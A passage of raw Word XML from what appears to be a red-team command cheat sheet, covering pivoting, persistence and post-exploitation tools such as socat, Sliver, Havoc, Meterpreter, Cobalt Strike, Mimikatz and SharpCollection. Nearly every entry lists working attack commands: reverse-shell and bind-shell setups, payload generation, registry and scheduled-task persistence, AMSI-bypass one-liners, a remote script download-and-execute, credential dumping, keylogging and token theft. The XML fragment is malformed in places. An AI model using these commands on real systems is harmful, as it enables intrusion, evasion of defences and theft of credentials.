        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Multipurpose relay tool for bidirectional data transfer between addresses. Creates TCP/UDP tunnels, port forwards, and encrypted channels with unmatched flexibility across Unix systems.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socat TCP4-LISTEN:$PORT,fork TCP4:$TARGET:$TARGET_PORT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socat TCP4:$TARGET:$PORT EXEC:'$COMMAND'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socat -u FILE:$FILE TCP4:$TARGET:$PORT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socat OPENSSL-LISTEN:$PORT,cert=$CERT,key=$KEY,verify=0,fork STDOUT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socat TCP4-LISTEN:$PORT,fork OPENSSL:$TARGET:$TARGET_PORT,verify=0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socat -d -d TCP4-LISTEN:$PORT,fork SOCKS4:$PROXY_HOST:$TARGET:$TARGET_PORT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socat PTY,link=$LINK,rawer,wait-slave EXEC:'$COMMAND'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socat UDP4-LISTEN:$PORT,fork UDP4:$TARGET:$TARGET_PORT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socat UNIX-LISTEN:$SOCKET,fork TCP4:$TARGET:$PORT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socat -t 10 TCP4-LISTEN:$PORT,fork SYSTEM:'$COMMAND'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socat TCP4-LISTEN:$PORT,fork EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. ProxyChains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Forces TCP connections through SOCKS4a/5 or HTTP proxies. Transparently tunnels any command-line tool through pivot hosts, enabling network enumeration from compromised systems.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proxychains nmap -sT -Pn -p $PORTS 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proxychains smbclient -L //$TARGET -U $USER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proxychains ssh $USER@$TARGET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proxychains python3 $EXPLOIT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proxychains curl http://$TARGET:$PORT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proxychains python3 -m http.server $PORT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proxychains impacket-psexec $DOMAIN/$USER:$PASSWORD@$TARGET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proxychains rpcclient -U $USER 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proxychains enum4linux -a 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proxychains ldapsearch -x -H ldap://$TARGET -b '$BASE'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proxychains bloodhound-python -d $DOMAIN -u $USER -p $PASSWORD -ns $TARGET -c All</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. SSHuttle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Transparent VPN over SSH that tunnels entire network ranges without requiring admin access on the target. Acts as a poor man's VPN with automatic routing and DNS forwarding.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sshuttle -r $USER@$TARGET $NETWORK -v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sshuttle -r $USER@$TARGET $NETWORK --dns -v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sshuttle -r $USER@$TARGET $NETWORK --auto-nets -v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sshuttle -r $USER@$TARGET $NETWORK -x $EXCLUDE -v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sshuttle -r $USER@$TARGET $NETWORK --python python3 -v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sshuttle -r $USER@$TARGET $NETWORK --seed-hosts $HOSTS -v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sshuttle -r $USER@$TARGET $NETWORK --method nat -v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sshuttle -r $USER@$TARGET $NETWORK --method tproxy -v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sshuttle -r $USER@$TARGET $NETWORK --disable-ipv6 -v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sshuttle -r $USER@$TARGET $NETWORK -l 0.0.0.0 -v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sshuttle -r $USER@$TARGET 0/0 --dns -v</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. NetExec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Successor to CrackMapExec with enhanced protocols and improved performance. Unified interface for SMB, SSH, LDAP, WinRM, MSSQL, and RDP operations with modular extensibility.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nxc smb $TARGETS -u $USER -p $PASSWORD -x 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nxc smb $TARGETS -u $USER -p $PASSWORD --shares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nxc smb $TARGETS -u $USER -p $PASSWORD --sam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nxc smb $TARGETS -u $USER -p $PASSWORD --lsa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nxc smb $TARGETS -u $USER -p $PASSWORD --ntds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nxc ldap $TARGETS -u $USER -p $PASSWORD --bloodhound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nxc winrm $TARGETS -u $USER -p $PASSWORD -x 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nxc ssh $TARGETS -u $USER -p $PASSWORD -x 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nxc mssql $TARGETS -u $USER -p $PASSWORD -x 'SELECT @@version'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nxc rdp $TARGETS -u $USER -p $PASSWORD --screenshot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nxc smb $TARGETS -u $USER -H $HASH --local-auth -x 'whoami'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 8: Persistence</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc008" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Maintaining access to compromised environments through various persistence mechanisms and evading defensive controls. This phase ensures continued operational capability despite defensive countermeasures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tools are selected for their ability to establish stealthy, resilient access while bypassing modern EDR/XDR solutions through direct syscalls, AMSI bypass, and living-off-the-land techniques.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Sliver C2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Advanced cross-platform command and control framework with multiple transport options. Features in-memory execution, process injection, and extensive evasion capabilities for sustained access.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generate --http http://$LHOST --format exe --save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generate --mtls $LHOST --format shellcode --save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generate --dns $DOMAIN --format shared --save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generate --http http://$LHOST --format service --save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generate --http http://$LHOST --limit-lhost $LHOST --save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profiles new --mtls $LHOST --format exe $PROFILE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sessions -i $SESSION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execute -o -s $SESSION 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inject --pid $PID -p $PAYLOAD $SESSION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backdoor --file $FILE $SESSION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sliver-server generate --http http://$LHOST --evasion --debug --save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2. Havoc C2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Modern GUI-driven command and control framework with Demon implants. Features sleep mask kits, x64 return address stack spoofing, indirect syscalls, and hardware breakpoint hooking for EDR evasion.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payload demon --arch x64 --format exe --sleep 15 --jitter 20 -o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payload demon --arch x64 --format dll --sleep 10 -o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payload demon --arch x64 --format shellcode --sleep 5 -o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payload demon --arch x64 --format service-exe --sleep 20 -o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payload demon --arch x64 --format pspowershell --sleep 10 -o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payload demon --arch x64 --format raw --sleep 15 -o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payload demon --arch x64 --format syscall-shellcode --sleep 10 -o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payload demon --arch x64 --format dotnet-exe --sleep 15 -o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listener http --port $PORT --hosts $LHOST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agent list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havoc agent interact $AGENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Metasploit's advanced payload with extensible post-exploitation capabilities. Provides in-memory DLL injection, channelized communication, and scripting for persistent access maintenance.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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT -f exe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msfconsole -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST $LHOST; set LPORT $LPORT; set ExitOnSession false; set AutoRunScript persistence; exploit -j'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run persistence -U -i 10 -p $PORT -r $LHOST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run persistence -X -i 10 -p $PORT -r $LHOST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run persistence -S -i 10 -p $PORT -r $LHOST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execute -f notepad.exe -m -d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migrate $PID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load extapi; clipboard_get_data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getsystem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run post/windows/manage/migrate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transport add -t reverse_tcp -l $LHOST -p $PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. SharPersist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Windows persistence toolkit written in C#. Implements 15+ persistence techniques including scheduled tasks, registry modifications, WMI events, and startup folder manipulation.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SharPersist.exe -t reg -c 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -a '-ep bypass -file C:\temp\script.ps1' -k 'hkcurun' -n $NAME -m add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SharPersist.exe -t schtask -c 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -a '-ep bypass -file C:\temp\script.ps1' -n $NAME -m add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SharPersist.exe -t startupfolder -c 'C:\temp\payload.exe' -n $NAME -m add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SharPersist.exe -t service -c 'C:\temp\payload.exe' -n $NAME -m add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SharPersist.exe -t trojan -c 'C:\temp\payload.exe' -n $NAME -m add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SharPersist.exe -t wmi -c 'notepad.exe' -n $NAME -m add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SharPersist.exe -t shortcutmod -c 'C:\temp\payload.exe' -f 'C:\Users\$USER\Desktop\*.lnk' -m add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SharPersist.exe -t skeleton -m add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SharPersist.exe -t envvar -c 'C:\temp\payload.exe' -n $NAME -m add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SharPersist.exe -t reg -k 'hklmrun' -n $NAME -m check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SharPersist.exe -t schtask -n $NAME -m remove</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Cobalt Strike</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Industry-standard adversary simulation platform. Features Beacon implants with malleable C2 profiles, SMB/TCP beacons, and extensive post-exploitation capabilities for enterprise-grade engagements.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cobaltstrike-teamserver $LHOST $PASSWORD $C2_PROFILE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cobaltstrike -dns $DOMAIN -profile $PROFILE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cobaltstrike -stageless -profile $PROFILE -output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cobaltstrike -type smb-beacon -output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cobaltstrike -type tcp-beacon -output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cobaltstrike -pivot tcp -target $TARGET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cobaltstrike -inject $PID -payload $PAYLOAD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cobaltstrike -command 'shspawn $SHELLCODE'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cobaltstrike -ls $PATH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cobaltstrike -upload $LOCAL_FILE $REMOTE_PATH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cobaltstrike -download $REMOTE_FILE $LOCAL_PATH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6. AMSI Bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Collection of techniques to bypass the Antimalware Scan Interface in Windows. Enables execution of PowerShell scripts and .NET assemblies that would otherwise be blocked by modern AV/EDR.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-c "$a=[Ref].Assembly.GetTypes()|Where-Object {$_.Name -like '*iUtils'}; $b=$a.GetFields('NonPublic,Static')|Where-Object {$_.Name -like '*Context'}; $b.SetValue($null,[IntPtr]::Zero)"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-c "[Delegate]::CreateDelegate([Func[string]],[System.Management.Automation.AmsiUtils],"Initialize")|Invoke-Expression"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-c "$gPC=[Ref].Assembly.GetTypes()|?{$_.Name -like '*iUtils'};$f=$gPC.GetFields('NonPublic,Static')|?{$_.Name -eq 'amsiSession'};$f.SetValue($null,$null)"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-c "$MethodDefinition='[DllImport("amsi.dll")] public static extern int AmsiInitialize(string, out IntPtr);'; $amsi=[Add-Type -MemberDefinition $MethodDefinition -Name 'amsi' -PassThru]; $ctx=[IntPtr]::Zero; $amsi::AmsiInitialize('Scan',$ctx)"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-c "$p=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $f=$p.GetField('amsiInitFailed','NonPublic,Static'); $f.SetValue($null,$true)"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-c "Add-Type -TypeDefinition 'using System; public class Bypass { public static int AmsiScanBuffer(IntPtr a, IntPtr b, int c, string d, ref int e) { return 0; } }'"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-c "$p=[Reflection.Assembly]::LoadWithPartialName('System.Management.Automation'); $t=$p.GetType('System.Management.Automation.AmsiUtils'); $f=$t.GetField('amsiInitFailed','NonPublic,Static'); $f.SetValue($null,$true)"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-c "$p=[Ref].Assembly.GetTypes()|Where {$_.Name -like '*iUtils'}; $f=$p.GetFields('NonPublic,Static')|Where {$_.Name -like '*Failed'}; $f.SetValue($null,$true)"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-c "[System.Reflection.Assembly]::LoadWithPartialName('System.Management.Automation')|Out-Null;[System.Management.Automation.AmsiUtils]::amsiInitFailed=$true"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-c "IEX (New-Object Net.WebClient).DownloadString('http://$LHOST/amsi-bypass.ps1')"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-c "$r=[Ref].Assembly.GetTypes()|?{$_.Name -like '*Utils'};$m=$r.GetFields('NonPublic,Static')|?{$_.Name -like '*Context'};if($m){$m.SetValue($null,[IntPtr]::Zero)}"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. Invoke-Obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell command and script obfuscation framework. Applies multiple encoding layers to evade signature-based detection while maintaining script functionality.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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'TOKEN,ALL,1' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'ENCODING,'\\x00'' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'COMPRESS,1' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'LAUNCHER,PS'',$RUNSPACE' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'TOKEN,MEMBER,1' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'TOKEN,COMMAND,1' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'TOKEN,ARGUMENT,1' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'TOKEN,STRING,1' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'CLEAN' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'MINIMAL' -Quiet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Invoke-Obfuscation -ScriptPath $SCRIPT -Command 'TOKEN,ALL,3' -Quiet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>8. ThreatCheck</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Defensive evasion analysis tool that identifies specific bytes in a payload that trigger Windows Defender detections. Enables surgical modification of payloads to evade signature detection.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ThreatCheck.exe -f $FILE -e AMSI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ThreatCheck.exe -f $FILE -e Defender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ThreatCheck.exe -f $FILE -e AMSI -t $TIMEOUT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ThreatCheck.exe -f $FILE -e Defender -t $TIMEOUT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ThreatCheck.exe -f $FILE -e AMSI -format hex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ThreatCheck.exe -f $FILE -e Defender -format raw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ThreatCheck.exe -f $FILE -e AMSI -clean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ThreatCheck.exe -f $FILE -e Defender -clean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ThreatCheck.exe -f $FILE -e AMSI -chunk 256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ThreatCheck.exe -f $FILE -e Defender -chunk 512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ThreatCheck.exe -f $FILE -e AMSI -threads 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>9. SysWhispers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Direct syscall invocation tool for EDR evasion. Generates header and ASM files for calling Windows syscalls directly, bypassing user-mode API hooks placed by EDR solutions.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syswhispers.py --preset common -o $OUTPUT_DIR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syswhispers.py --functions NtAllocateVirtualMemory,NtProtectVirtualMemory,NtCreateThreadEx -o $OUTPUT_DIR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syswhispers.py --preset all -o $OUTPUT_DIR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syswhispers.py --functions NtReadVirtualMemory,NtWriteVirtualMemory -o $OUTPUT_DIR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syswhispers.py --preset common --arch x64 -o $OUTPUT_DIR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syswhispers.py --preset common --arch x86 -o $OUTPUT_DIR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syswhispers.py --functions NtOpenProcess,NtQuerySystemInformation -o $OUTPUT_DIR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syswhispers.py --preset common --wow64 -o $OUTPUT_DIR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syswhispers.py --functions NtMapViewOfSection,NtUnmapViewOfSection -o $OUTPUT_DIR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syswhispers.py --preset common --version 1903 -o $OUTPUT_DIR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syswhispers.py --preset common --version 2004 -o $OUTPUT_DIR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>10. PoshC2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Proxy-aware C2 framework using PowerShell and Python implants. Features in-memory execution, modular architecture, and extensive evasion capabilities for sustained access.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posh-project -n $PROJECT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posh-server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posh -u $URL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posh-config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posh-modules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posh-interact $IMPLANT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posh-task $IMPLANT '$COMMAND'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posh-loadmodule $IMPLANT $MODULE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posh-screenshot $IMPLANT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posh-download $IMPLANT $REMOTE_FILE $LOCAL_PATH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posh-upload $IMPLANT $LOCAL_FILE $REMOTE_PATH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 9: Objectives</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc009" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Executing mission-critical actions to achieve engagement goals including data collection, screenshot capture, keylogging, and achieving specific impact objectives within scope.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Tools in this phase focus on precision, stealth, and producing high-fidelity output for reporting while maintaining operational security throughout objective execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1. Metasploit Post Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Comprehensive post-exploitation framework with hundreds of modules for data collection, screenshot capture, keylogging, and system manipulation across all major platforms.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run post/windows/gather/hashdump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run post/windows/gather/credentials/credential_collector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run post/multi/gather/ssh_creds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run post/windows/gather/enum_chrome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run post/windows/gather/enum_firefox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run post/windows/gather/enum_applications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run post/windows/gather/enum_logged_on_users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run post/windows/gather/enum_shares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run post/multi/manage/extapi/camera_list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screenshot -v -p $PATH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run post/windows/manage/enable_rdp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2. Meterpreter Extensions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Extended Meterpreter capabilities including espia for screen capture, incognito for token manipulation, and extapi for advanced system interaction.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use espia; screengrab -v -p $PATH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load incognito; list_tokens -u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impersonate_token $DOMAIN\\$USER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steal_token $PID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drop_token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load extapi; window_enum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load extapi; clipboard_get_data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load extapi; service_enum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keyscan_start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keyscan_dump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meterpreter &gt; keyscan_stop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3. Invoke-Mimikatz</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell implementation of Mimikatz for credential extraction without touching disk. Extracts passwords, hashes, and Kerberos tickets entirely in memory.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'Invoke-Mimikatz -DumpCreds'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'Invoke-Mimikatz -DumpCerts'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'Invoke-Mimikatz -Command "lsadump::sam"'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'Invoke-Mimikatz -Command "token::elevate"'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'Invoke-Mimikatz -Command "lsadump::lsa /patch"'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'Invoke-Mimikatz -Command "sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH"'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'Invoke-Mimikatz -Command "kerberos::list /export"'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'Invoke-Mimikatz -Command "lsadump::dcsync /domain:$DOMAIN /user:$TARGET_USER"'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'Invoke-Mimikatz -DumpCreds -ComputerName $TARGET'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'Invoke-Mimikatz -Command "crypto::certificates /systemstore:LOCAL_MACHINE /export"'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powershell -ep bypass -c 'Invoke-Mimikatz -Command "lsadump::backupkeys /export"'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>4. PowerUpSQL</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PowerShell toolkit for attacking SQL Server instances. Enables privilege escalation, data exfiltration, and code execution through trusted database connections across the enterprise.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Import-Module PowerUpSQL; Get-SQLInstanceDomain | Get-SQLConnectionTest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Get-SQLInstanceDomain | Get-SQLServerInfo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Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords password -SampleSize 5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Get-SQLInstanceDomain | Get-SQLQuery -Query 'SELECT @@version'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Get-SQLInstanceDomain | Invoke-SQLOSCmd -Command 'whoami'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Get-SQLInstanceDomain | Invoke-SQLOSCmdCmd -Command 'net user $USER $PASS /add'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Get-SQLInstanceDomain | Get-SQLDatabase -Verbose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Get-SQLInstanceDomain | Get-SQLTable -Database $DB -Verbose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Get-SQLInstanceDomain | Get-SQLColumn -Database $DB -Table $TABLE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Get-SQLInstanceDomain | Invoke-SQLOSCmdOle -Command 'powershell -enc $ENCODED'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Get-SQLInstanceDomain | Invoke-SQLAudit -Verbose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5. Seatbelt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Comprehensive Windows enumeration and data collection tool. Gathers system information, security settings, and interesting files for situational awareness and evidence collection.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Seatbelt.exe -group=all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Seatbelt.exe -group=system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Seatbelt.exe -group=user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Seatbelt.exe -group=slack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Seatbelt.exe -group=chrome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Seatbelt.exe -group=remote -computername $TARGET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Seatbelt.exe $MODULE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Seatbelt.exe -q $MODULE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Seatbelt.exe -group=system -computername $TARGET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Seatbelt.exe -full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Seatbelt.exe -group=defenses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6. SharpCollection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="8b949e"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Curated collection of C# offensive security tools compiled as .NET assemblies. Enables in-memory execution of powerful post-exploitation capabilities without touching disk.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rubeus.exe kerberoast /outfile:$OUTPUT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All -d $DOMAIN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sharpview.exe Get-DomainUser -Identity $USER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sharpdpapi.exe masterkeys /pvk $PVK_KEY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sharpsploit.exe Credentials Mimikatz DumpCreds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sharpchrome.exe logins /format:json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sharplaps.exe /server:$DC /user:$USER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sharpup.exe Audit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sharpsccm.exe decryptsecrets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sharpwitrs.exe dump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sharpsploit.exe Execution ShellCodeInjection -ShellCode $SC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>7. BloodHound</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
